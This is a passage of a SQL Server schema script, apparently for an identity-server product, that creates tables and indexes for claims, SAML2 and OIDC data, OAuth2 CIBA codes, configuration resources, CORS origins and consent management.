FOREIGN KEY (LOCAL_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE CASCADE,
CONSTRAINT USER_STORE_DOMAIN_CONSTRAINT UNIQUE (LOCAL_CLAIM_ID, USER_STORE_DOMAIN_NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM_PROPERTY (
ID INTEGER NOT NULL IDENTITY,
LOCAL_CLAIM_ID INTEGER,
PROPERTY_NAME VARCHAR (255) NOT NULL,
PROPERTY_VALUE VARCHAR (255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (LOCAL_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE CASCADE,
CONSTRAINT PROPERTY_NAME_CONSTRAINT UNIQUE (LOCAL_CLAIM_ID, PROPERTY_NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CLAIM_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CLAIM_MAPPING (
ID INTEGER NOT NULL IDENTITY,
EXT_CLAIM_ID INTEGER NOT NULL,
MAPPED_LOCAL_CLAIM_ID INTEGER NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (EXT_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE CASCADE ,
FOREIGN KEY (MAPPED_LOCAL_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE NO ACTION ,
CONSTRAINT EXT_TO_LOC_MAPPING_CONSTRN UNIQUE (EXT_CLAIM_ID, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_SAML2_ASSERTION_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_SAML2_ASSERTION_STORE (
ID INTEGER NOT NULL IDENTITY,
SAML2_ID VARCHAR(255) ,
SAML2_ISSUER VARCHAR(255) ,
SAML2_SUBJECT VARCHAR(255) ,
SAML2_SESSION_INDEX VARCHAR(255) ,
SAML2_AUTHN_CONTEXT_CLASS_REF VARCHAR(255) ,
SAML2_ASSERTION VARCHAR(4096) ,
ASSERTION VARBINARY(MAX) ,
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_SAML2_ARTIFACT_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_SAML2_ARTIFACT_STORE (
ID INTEGER NOT NULL IDENTITY,
SOURCE_ID VARCHAR(255) NOT NULL,
MESSAGE_HANDLER VARCHAR(255) NOT NULL,
AUTHN_REQ_DTO VARBINARY(MAX) NOT NULL,
SESSION_ID VARCHAR(255) NOT NULL,
INIT_TIMESTAMP DATETIME NOT NULL,
EXP_TIMESTAMP DATETIME NOT NULL,
ASSERTION_ID VARCHAR(255),
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_JTI]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_JTI (
JWT_ID VARCHAR(255) NOT NULL,
EXP_TIME DATETIME NOT NULL,
TIME_CREATED DATETIME NOT NULL,
PRIMARY KEY (JWT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_PROPERTY (
ID INTEGER NOT NULL IDENTITY,
TENANT_ID INTEGER ,
CONSUMER_KEY VARCHAR(255) ,
PROPERTY_KEY VARCHAR(255) NOT NULL ,
PROPERTY_VALUE VARCHAR(2047) ,
PRIMARY KEY (ID),
FOREIGN KEY (CONSUMER_KEY) REFERENCES IDN_OAUTH_CONSUMER_APPS(CONSUMER_KEY) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_REQ_OBJECT_REFERENCE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_REQ_OBJECT_REFERENCE (
ID INTEGER NOT NULL IDENTITY,
CONSUMER_KEY_ID INTEGER ,
CODE_ID VARCHAR(255) ,
TOKEN_ID VARCHAR(255) ,
SESSION_DATA_KEY VARCHAR(255),
PRIMARY KEY (ID),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE ,
FOREIGN KEY (TOKEN_ID) REFERENCES IDN_OAUTH2_ACCESS_TOKEN(TOKEN_ID),
FOREIGN KEY (CODE_ID) REFERENCES IDN_OAUTH2_AUTHORIZATION_CODE(CODE_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_REQ_OBJECT_CLAIMS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_REQ_OBJECT_CLAIMS (
ID INTEGER NOT NULL IDENTITY,
REQ_OBJECT_ID INTEGER,
CLAIM_ATTRIBUTE VARCHAR(255) ,
ESSENTIAL CHAR(1) NOT NULL DEFAULT '0' ,
VALUE VARCHAR(255) ,
IS_USERINFO CHAR(1) NOT NULL DEFAULT '0',
PRIMARY KEY (ID),
FOREIGN KEY (REQ_OBJECT_ID) REFERENCES IDN_OIDC_REQ_OBJECT_REFERENCE (ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_REQ_OBJ_CLAIM_VALUES]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_REQ_OBJ_CLAIM_VALUES (
ID INTEGER NOT NULL IDENTITY,
REQ_OBJECT_CLAIMS_ID INTEGER ,
CLAIM_VALUES VARCHAR(255) ,
PRIMARY KEY (ID),
FOREIGN KEY (REQ_OBJECT_CLAIMS_ID) REFERENCES IDN_OIDC_REQ_OBJECT_CLAIMS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CERTIFICATE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_CERTIFICATE (
ID INTEGER IDENTITY,
NAME VARCHAR(100),
CERTIFICATE_IN_PEM VARBINARY(MAX),
TENANT_ID INTEGER DEFAULT 0,
PRIMARY KEY(ID),
CONSTRAINT CERTIFICATE_UNIQUE_KEY UNIQUE (NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OIDC_SCOPE_CLAIM_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OIDC_SCOPE_CLAIM_MAPPING (
ID INTEGER IDENTITY,
SCOPE_ID INTEGER NOT NULL,
EXTERNAL_CLAIM_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (SCOPE_ID) REFERENCES IDN_OAUTH2_SCOPE(SCOPE_ID) ON DELETE CASCADE,
FOREIGN KEY (EXTERNAL_CLAIM_ID) REFERENCES IDN_CLAIM(ID) ON DELETE CASCADE,
UNIQUE (SCOPE_ID, EXTERNAL_CLAIM_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_FUNCTION_LIBRARY]') AND TYPE IN (N'U'))
CREATE TABLE IDN_FUNCTION_LIBRARY (
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
TYPE VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DATA VARBINARY(MAX) NOT NULL,
PRIMARY KEY (TENANT_ID,NAME)
);
CREATE TABLE IDN_OAUTH2_CIBA_AUTH_CODE (
AUTH_CODE_KEY CHAR (36),
AUTH_REQ_ID CHAR (36),
ISSUED_TIME DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
CONSUMER_KEY VARCHAR(255),
LAST_POLLED_TIME DATETIME NOT NULL,
POLLING_INTERVAL INTEGER,
EXPIRES_IN INTEGER,
AUTHENTICATED_USER_NAME VARCHAR(255),
USER_STORE_DOMAIN VARCHAR(100),
TENANT_ID INTEGER,
AUTH_REQ_STATUS VARCHAR (100) DEFAULT 'REQUESTED',
IDP_ID INTEGER,
UNIQUE(AUTH_REQ_ID),
PRIMARY KEY (AUTH_CODE_KEY),
FOREIGN KEY (CONSUMER_KEY) REFERENCES IDN_OAUTH_CONSUMER_APPS(CONSUMER_KEY) ON DELETE CASCADE
);
CREATE TABLE IDN_OAUTH2_CIBA_REQUEST_SCOPES (
AUTH_CODE_KEY CHAR (36),
SCOPE VARCHAR (255),
FOREIGN KEY (AUTH_CODE_KEY) REFERENCES IDN_OAUTH2_CIBA_AUTH_CODE(AUTH_CODE_KEY) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_FED_AUTH_SESSION_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_FED_AUTH_SESSION_MAPPING (
IDP_SESSION_ID VARCHAR(255) NOT NULL,
SESSION_ID VARCHAR(255) NOT NULL,
IDP_NAME VARCHAR(255) NOT NULL,
AUTHENTICATOR_ID VARCHAR(255),
PROTOCOL_TYPE VARCHAR(255),
TIME_CREATED DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (IDP_SESSION_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CONFIG_TYPE]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CONFIG_TYPE (
ID VARCHAR(255) NOT NULL,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023) NULL,
PRIMARY KEY (ID),
CONSTRAINT TYPE_NAME_CONSTRAINT UNIQUE (NAME)
);
INSERT INTO IDN_CONFIG_TYPE (ID, NAME, DESCRIPTION) VALUES
('9ab0ef95-13e9-4ed5-afaf-d29bed62f7bd', 'IDP_TEMPLATE', 'Template type to uniquely identify IDP templates'),
('3c4ac3d0-5903-4e3d-aaca-38df65b33bfd', 'APPLICATION_TEMPLATE', 'Template type to uniquely identify Application templates'),
('8ec6dbf1-218a-49bf-bc34-0d2db52d151c', 'CORS_CONFIGURATION', 'A resource type to keep the tenant CORS configurations');
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CONFIG_RESOURCE]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CONFIG_RESOURCE (
ID VARCHAR(255) NOT NULL,
TENANT_ID INT NOT NULL,
NAME VARCHAR(255) NOT NULL,
CREATED_TIME DATETIME NOT NULL,
LAST_MODIFIED DATETIME NOT NULL,
HAS_FILE BIT DEFAULT 0 NOT NULL,
HAS_ATTRIBUTE BIT DEFAULT 0 NOT NULL,
TYPE_ID VARCHAR(255) NOT NULL,
UNIQUE (NAME, TENANT_ID, TYPE_ID),
PRIMARY KEY (ID)
);
ALTER TABLE IDN_CONFIG_RESOURCE ADD CONSTRAINT TYPE_ID_FOREIGN_CONSTRAINT FOREIGN KEY (TYPE_ID) REFERENCES
IDN_CONFIG_TYPE (ID) ON DELETE CASCADE ON UPDATE CASCADE;
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CONFIG_ATTRIBUTE]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CONFIG_ATTRIBUTE (
ID VARCHAR(255) NOT NULL,
RESOURCE_ID VARCHAR(255) NOT NULL,
ATTR_KEY VARCHAR(255) NOT NULL,
ATTR_VALUE VARCHAR(1023) NULL,
PRIMARY KEY (ID),
UNIQUE (RESOURCE_ID, ATTR_KEY)
);
ALTER TABLE IDN_CONFIG_ATTRIBUTE ADD CONSTRAINT RESOURCE_ID_ATTRIBUTE_FOREIGN_CONSTRAINT FOREIGN KEY (RESOURCE_ID)
REFERENCES IDN_CONFIG_RESOURCE (ID) ON DELETE CASCADE ON UPDATE CASCADE;
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CONFIG_FILE]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CONFIG_FILE (
ID VARCHAR(255) NOT NULL,
VALUE VARBINARY(MAX) NULL,
NAME VARCHAR(255) NULL,
RESOURCE_ID VARCHAR(255) NOT NULL,
PRIMARY KEY (ID)
);
ALTER TABLE IDN_CONFIG_FILE ADD CONSTRAINT RESOURCE_ID_FILE_FOREIGN_CONSTRAINT FOREIGN KEY (RESOURCE_ID) REFERENCES
IDN_CONFIG_RESOURCE (ID) ON DELETE CASCADE ON UPDATE CASCADE;
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_REMOTE_FETCH_CONFIG]') AND TYPE IN (N'U'))
CREATE TABLE IDN_REMOTE_FETCH_CONFIG (
ID VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
IS_ENABLED CHAR(1) NOT NULL,
REPO_MANAGER_TYPE VARCHAR(255) NOT NULL,
ACTION_LISTENER_TYPE VARCHAR(255) NOT NULL,
CONFIG_DEPLOYER_TYPE VARCHAR(255) NOT NULL,
REMOTE_FETCH_NAME VARCHAR(255),
REMOTE_RESOURCE_URI VARCHAR(255) NOT NULL,
ATTRIBUTES_JSON TEXT NOT NULL,
PRIMARY KEY (ID),
CONSTRAINT UC_REMOTE_RESOURCE_TYPE UNIQUE (TENANT_ID, CONFIG_DEPLOYER_TYPE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_REMOTE_FETCH_REVISIONS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_REMOTE_FETCH_REVISIONS (
ID VARCHAR(255) NOT NULL,
CONFIG_ID VARCHAR(255) NOT NULL,
FILE_PATH VARCHAR(255) NOT NULL,
FILE_HASH VARCHAR(255),
DEPLOYED_DATE DATETIME,
LAST_SYNC_TIME DATETIME,
DEPLOYMENT_STATUS VARCHAR(255),
ITEM_NAME VARCHAR(255),
DEPLOY_ERR_LOG TEXT,
PRIMARY KEY (ID),
FOREIGN KEY (CONFIG_ID) REFERENCES IDN_REMOTE_FETCH_CONFIG(ID) ON DELETE CASCADE,
CONSTRAINT UC_REVISIONS UNIQUE (CONFIG_ID, ITEM_NAME)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_USER_FUNCTIONALITY_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_USER_FUNCTIONALITY_MAPPING (
ID VARCHAR(255) NOT NULL,
USER_ID VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
FUNCTIONALITY_ID VARCHAR(255) NOT NULL,
IS_FUNCTIONALITY_LOCKED BIT NOT NULL,
FUNCTIONALITY_UNLOCK_TIME BIGINT NOT NULL,
FUNCTIONALITY_LOCK_REASON VARCHAR(1023),
FUNCTIONALITY_LOCK_REASON_CODE VARCHAR(255),
PRIMARY KEY (ID),
CONSTRAINT IDN_USER_FUNCTIONALITY_MAPPING_CONSTRAINT UNIQUE (TENANT_ID, USER_ID, FUNCTIONALITY_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_USER_FUNCTIONALITY_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE IDN_USER_FUNCTIONALITY_PROPERTY (
ID VARCHAR(255) NOT NULL,
USER_ID VARCHAR(255) NOT NULL,
TENANT_ID INTEGER NOT NULL,
FUNCTIONALITY_ID VARCHAR(255) NOT NULL,
PROPERTY_NAME VARCHAR(255),
PROPERTY_VALUE VARCHAR(255),
PRIMARY KEY (ID),
CONSTRAINT IDN_USER_FUNCTIONALITY_PROPERTY_CONSTRAINT UNIQUE (USER_ID, TENANT_ID, FUNCTIONALITY_ID, PROPERTY_NAME)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CORS_ORIGIN]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CORS_ORIGIN (
ID INT NOT NULL IDENTITY,
TENANT_ID INT NOT NULL,
ORIGIN VARCHAR(2048) NOT NULL,
UUID CHAR(36) NOT NULL,
PRIMARY KEY (ID),
UNIQUE (TENANT_ID, ORIGIN),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_CORS_ASSOCIATION]')
AND TYPE IN (N'U'))
CREATE TABLE IDN_CORS_ASSOCIATION (
IDN_CORS_ORIGIN_ID INT NOT NULL,
SP_APP_ID INT NOT NULL,
PRIMARY KEY (IDN_CORS_ORIGIN_ID, SP_APP_ID),
FOREIGN KEY (IDN_CORS_ORIGIN_ID) REFERENCES IDN_CORS_ORIGIN (ID) ON DELETE CASCADE,
FOREIGN KEY (SP_APP_ID) REFERENCES SP_APP (ID) ON DELETE CASCADE
);
-- --------------------------- INDEX CREATION -----------------------------
-- IDN_OAUTH2_ACCESS_TOKEN --
CREATE INDEX IDX_TC ON IDN_OAUTH2_ACCESS_TOKEN(TIME_CREATED);
CREATE INDEX IDX_ATH ON IDN_OAUTH2_ACCESS_TOKEN(ACCESS_TOKEN_HASH);
CREATE INDEX IDX_AT_CK_AU ON IDN_OAUTH2_ACCESS_TOKEN(CONSUMER_KEY_ID, AUTHZ_USER, TOKEN_STATE, USER_TYPE);
CREATE INDEX IDX_AT_TI_UD ON IDN_OAUTH2_ACCESS_TOKEN(AUTHZ_USER, TENANT_ID, TOKEN_STATE, USER_DOMAIN);
CREATE INDEX IDX_AT_AU_TID_UD_TS_CKID ON IDN_OAUTH2_ACCESS_TOKEN(AUTHZ_USER, TENANT_ID, USER_DOMAIN, TOKEN_STATE, CONSUMER_KEY_ID);
CREATE INDEX IDX_AT_AT ON IDN_OAUTH2_ACCESS_TOKEN (AUTHZ_USER) INCLUDE (ACCESS_TOKEN);
CREATE INDEX IDX_AT_AU_CKID_TS_UT ON IDN_OAUTH2_ACCESS_TOKEN(AUTHZ_USER, CONSUMER_KEY_ID, TOKEN_STATE, USER_TYPE);
CREATE INDEX IDX_AT_RTH ON IDN_OAUTH2_ACCESS_TOKEN(REFRESH_TOKEN_HASH);
CREATE INDEX IDX_AT_RT ON IDN_OAUTH2_ACCESS_TOKEN (AUTHZ_USER) INCLUDE (REFRESH_TOKEN);
CREATE INDEX IDX_AT_CKID_AU_TID_UD_TSH_TS ON IDN_OAUTH2_ACCESS_TOKEN(CONSUMER_KEY_ID, AUTHZ_USER, TENANT_ID, USER_DOMAIN, TOKEN_SCOPE_HASH, TOKEN_STATE);
-- IDN_OAUTH2_AUTHORIZATION_CODE --
CREATE INDEX IDX_AUTHORIZATION_CODE_HASH ON IDN_OAUTH2_AUTHORIZATION_CODE (AUTHORIZATION_CODE_HASH, CONSUMER_KEY_ID);
CREATE INDEX IDX_AUTHORIZATION_CODE_AU_TI ON IDN_OAUTH2_AUTHORIZATION_CODE (AUTHZ_USER, TENANT_ID, USER_DOMAIN, STATE);
CREATE INDEX IDX_AC_CKID ON IDN_OAUTH2_AUTHORIZATION_CODE(CONSUMER_KEY_ID);
CREATE INDEX IDX_AC_TID ON IDN_OAUTH2_AUTHORIZATION_CODE(TOKEN_ID);
CREATE INDEX IDX_AC_AC_CKID ON IDN_OAUTH2_AUTHORIZATION_CODE (AUTHZ_USER) INCLUDE (AUTHORIZATION_CODE, CONSUMER_KEY_ID);
-- IDN_SCIM_GROUP --
CREATE INDEX IDX_IDN_SCIM_GROUP_TI_RN ON IDN_SCIM_GROUP (TENANT_ID, ROLE_NAME);
CREATE INDEX IDX_IDN_SCIM_GROUP_TI_RN_AN ON IDN_SCIM_GROUP (TENANT_ID, ROLE_NAME, ATTR_NAME);
-- IDN_AUTH_SESSION_STORE --
CREATE INDEX IDX_IDN_AUTH_SESSION_TIME ON IDN_AUTH_SESSION_STORE (TIME_CREATED);
-- IDN_AUTH_TEMP_SESSION_STORE --
CREATE INDEX IDX_IDN_AUTH_TMP_SESSION_TIME ON IDN_AUTH_TEMP_SESSION_STORE (TIME_CREATED);
-- IDN_OIDC_SCOPE_CLAIM_MAPPING --
CREATE INDEX IDX_AT_SI_ECI ON IDN_OIDC_SCOPE_CLAIM_MAPPING(SCOPE_ID, EXTERNAL_CLAIM_ID);
-- IDN_OAUTH2_SCOPE --
CREATE INDEX IDX_SC_TID ON IDN_OAUTH2_SCOPE(TENANT_ID);
-- IDN_OAUTH2_SCOPE_BINDING --
CREATE INDEX IDX_SB_SCPID ON IDN_OAUTH2_SCOPE_BINDING(SCOPE_ID);
-- IDN_OIDC_REQ_OBJECT_REFERENCE --
CREATE INDEX IDX_OROR_TID ON IDN_OIDC_REQ_OBJECT_REFERENCE(TOKEN_ID);
-- IDN_OAUTH2_ACCESS_TOKEN_SCOPE --
CREATE INDEX IDX_ATS_TID ON IDN_OAUTH2_ACCESS_TOKEN_SCOPE(TOKEN_ID);
-- SP_TEMPLATE --
CREATE INDEX IDX_SP_TEMPLATE ON SP_TEMPLATE (TENANT_ID, NAME);
-- IDN_AUTH_USER --
CREATE INDEX IDX_AUTH_USER_UN_TID_DN ON IDN_AUTH_USER (USER_NAME, TENANT_ID, DOMAIN_NAME);
CREATE INDEX IDX_AUTH_USER_DN_TOD ON IDN_AUTH_USER (DOMAIN_NAME, TENANT_ID);
-- IDN_AUTH_USER_SESSION_MAPPING --
CREATE INDEX IDX_USER_ID ON IDN_AUTH_USER_SESSION_MAPPING (USER_ID);
CREATE INDEX IDX_SESSION_ID ON IDN_AUTH_USER_SESSION_MAPPING (SESSION_ID);
-- IDN_OAUTH_CONSUMER_APPS --
CREATE INDEX IDX_OCA_UM_TID_UD_APN ON IDN_OAUTH_CONSUMER_APPS(USERNAME,TENANT_ID,USER_DOMAIN, APP_NAME);
-- IDX_SPI_APP --
CREATE INDEX IDX_SPI_APP ON SP_INBOUND_AUTH(APP_ID);
-- IDN_OIDC_PROPERTY --
CREATE INDEX IDX_IOP_TID_CK ON IDN_OIDC_PROPERTY(TENANT_ID,CONSUMER_KEY);
-- IDN_FIDO2_PROPERTY --
CREATE INDEX IDX_FIDO2_STR ON FIDO2_DEVICE_STORE(USER_NAME, TENANT_ID, DOMAIN_NAME, CREDENTIAL_ID, USER_HANDLE);
-- IDN_ASSOCIATED_ID --
CREATE INDEX IDX_AI_DN_UN_AI ON IDN_ASSOCIATED_ID(DOMAIN_NAME, USER_NAME, ASSOCIATION_ID);
-- IDN_OAUTH2_TOKEN_BINDING --
CREATE INDEX IDX_IDN_AUTH_BIND ON IDN_OAUTH2_TOKEN_BINDING (TOKEN_BINDING_REF);
-- IDN_FED_AUTH_SESSION_MAPPING --
CREATE INDEX IDX_FEDERATED_AUTH_SESSION_ID ON IDN_FED_AUTH_SESSION_MAPPING (SESSION_ID);
-- IDN_REMOTE_FETCH_REVISIONS --
CREATE INDEX IDX_REMOTE_FETCH_REVISION_CONFIG_ID ON IDN_REMOTE_FETCH_REVISIONS (CONFIG_ID);
-- IDN_CORS_ASSOCIATION --
CREATE INDEX IDX_CORS_SP_APP_ID ON IDN_CORS_ASSOCIATION (SP_APP_ID);
-- IDN_CORS_ASSOCIATION --
CREATE INDEX IDX_CORS_ORIGIN_ID ON IDN_CORS_ASSOCIATION (IDN_CORS_ORIGIN_ID);
-- Start of CONSENT-MGT Tables --
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_PII_CATEGORY]') AND TYPE IN (N'U'))
CREATE TABLE CM_PII_CATEGORY (
ID INTEGER NOT NULL IDENTITY,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
DISPLAY_NAME VARCHAR(255),
IS_SENSITIVE INTEGER NOT NULL,
TENANT_ID INTEGER DEFAULT '-1234',
CONSTRAINT CM_PII_CATEGORY_CNT UNIQUE (NAME, TENANT_ID),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_RECEIPT]') AND TYPE IN (N'U'))
CREATE TABLE CM_RECEIPT (
CONSENT_RECEIPT_ID VARCHAR(255) NOT NULL,
VERSION VARCHAR(255) NOT NULL,
JURISDICTION VARCHAR(255) NOT NULL,
CONSENT_TIMESTAMP DATETIME NOT NULL,
COLLECTION_METHOD VARCHAR(255) NOT NULL,
LANGUAGE VARCHAR(255) NOT NULL,
PII_PRINCIPAL_ID VARCHAR(255) NOT NULL,
PRINCIPAL_TENANT_ID INTEGER DEFAULT '-1234',
POLICY_URL VARCHAR(255) NOT NULL,
STATE VARCHAR(255) NOT NULL,
PII_CONTROLLER VARCHAR(2048) NOT NULL,
PRIMARY KEY (CONSENT_RECEIPT_ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_PURPOSE]') AND TYPE IN (N'U'))
CREATE TABLE CM_PURPOSE (
ID INTEGER NOT NULL IDENTITY,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
PURPOSE_GROUP VARCHAR(255) NOT NULL,
GROUP_TYPE VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT '-1234',
CONSTRAINT CM_PURPOSE_CNT UNIQUE (NAME, TENANT_ID, PURPOSE_GROUP, GROUP_TYPE),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_PURPOSE_CATEGORY]') AND TYPE IN (N'U'))
CREATE TABLE CM_PURPOSE_CATEGORY (
ID INTEGER NOT NULL IDENTITY,
NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(1023),
TENANT_ID INTEGER DEFAULT '-1234',
CONSTRAINT CM_PURPOSE_CATEGORY_CNT UNIQUE (NAME, TENANT_ID),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_RECEIPT_SP_ASSOC]') AND TYPE IN (N'U'))
CREATE TABLE CM_RECEIPT_SP_ASSOC (
ID INTEGER NOT NULL IDENTITY,
CONSENT_RECEIPT_ID VARCHAR(255) NOT NULL,
SP_NAME VARCHAR(255) NOT NULL,
SP_DISPLAY_NAME VARCHAR(255),
SP_DESCRIPTION VARCHAR(255),
SP_TENANT_ID INTEGER DEFAULT '-1234',
CONSTRAINT CM_RECEIPT_SP_ASSOC_CNT UNIQUE (CONSENT_RECEIPT_ID, SP_NAME, SP_TENANT_ID),
FOREIGN KEY (CONSENT_RECEIPT_ID) REFERENCES CM_RECEIPT (CONSENT_RECEIPT_ID),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_SP_PURPOSE_ASSOC]') AND TYPE IN (N'U'))
CREATE TABLE CM_SP_PURPOSE_ASSOC (
ID INTEGER NOT NULL IDENTITY,
RECEIPT_SP_ASSOC INTEGER NOT NULL,
PURPOSE_ID INTEGER NOT NULL,
CONSENT_TYPE VARCHAR(255) NOT NULL,
IS_PRIMARY_PURPOSE INTEGER NOT NULL,
TERMINATION VARCHAR(255) NOT NULL,
THIRD_PARTY_DISCLOSURE INTEGER NOT NULL,
THIRD_PARTY_NAME VARCHAR(255),
CONSTRAINT CM_SP_PURPOSE_ASSOC_CNT UNIQUE (RECEIPT_SP_ASSOC, PURPOSE_ID),
FOREIGN KEY (RECEIPT_SP_ASSOC) REFERENCES CM_RECEIPT_SP_ASSOC (ID),
FOREIGN KEY (PURPOSE_ID) REFERENCES CM_PURPOSE (ID),
PRIMARY KEY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_SP_PURPOSE_PURPOSE_CAT_ASSC]') AND TYPE IN (N'U'))
CREATE TABLE CM_SP_PURPOSE_PURPOSE_CAT_ASSC (
SP_PURPOSE_ASSOC_ID INTEGER NOT NULL,
PURPOSE_CATEGORY_ID INTEGER NOT NULL,
CONSTRAINT CM_SP_PURPOSE_PURPOSE_CAT_ASSC_CNT UNIQUE (SP_PURPOSE_ASSOC_ID, PURPOSE_CATEGORY_ID),
FOREIGN KEY (SP_PURPOSE_ASSOC_ID) REFERENCES CM_SP_PURPOSE_ASSOC (ID),
FOREIGN KEY (PURPOSE_CATEGORY_ID) REFERENCES CM_PURPOSE_CATEGORY (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_PURPOSE_PII_CAT_ASSOC]') AND TYPE IN (N'U'))
CREATE TABLE CM_PURPOSE_PII_CAT_ASSOC (
PURPOSE_ID INTEGER NOT NULL,
